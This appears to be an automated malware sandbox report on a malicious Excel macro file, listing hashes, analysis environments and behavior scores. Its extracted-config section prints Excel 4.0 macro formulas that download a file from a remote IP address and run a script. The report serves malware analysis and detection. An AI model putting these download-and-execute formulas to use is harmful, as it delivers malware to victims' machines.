General
-
Target
11d1fa6a78c3765065c09a57de614c0d
-
Size
6KB
-
Sample
231221-193c8afac4
-
MD5
11d1fa6a78c3765065c09a57de614c0d
-
SHA1
540cec05cdc8851952ca37ffd1576febb3390ef4
-
SHA256
91d0aa8a6ad5fc40de117e81b689949ed4d615af440323172f53c7cf9bc04af3
-
SHA512
0484ada017d2fa3533a280aa10793597f7a394f071bfe5198cc1428a0641da3763b18826a4730fcb17d613aaaa54109af63360668ed65876da4bec747df078e6
-
SSDEEP
192:NDSsuSibrA2OmmfRJ8UhHFBFYuXb98yIc90+oZ:NLu7M2wn1FYOb98yI2+Z
Static task
static1
Behavioral task
behavioral1
Sample
11d1fa6a78c3765065c09a57de614c0d.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
11d1fa6a78c3765065c09a57de614c0d.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
11d1fa6a78c3765065c09a57de614c0d
-
Size
6KB
-
MD5
11d1fa6a78c3765065c09a57de614c0d
-
SHA1
540cec05cdc8851952ca37ffd1576febb3390ef4
-
SHA256
91d0aa8a6ad5fc40de117e81b689949ed4d615af440323172f53c7cf9bc04af3
-
SHA512
0484ada017d2fa3533a280aa10793597f7a394f071bfe5198cc1428a0641da3763b18826a4730fcb17d613aaaa54109af63360668ed65876da4bec747df078e6
-
SSDEEP
192:NDSsuSibrA2OmmfRJ8UhHFBFYuXb98yIc90+oZ:NLu7M2wn1FYOb98yI2+Z
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-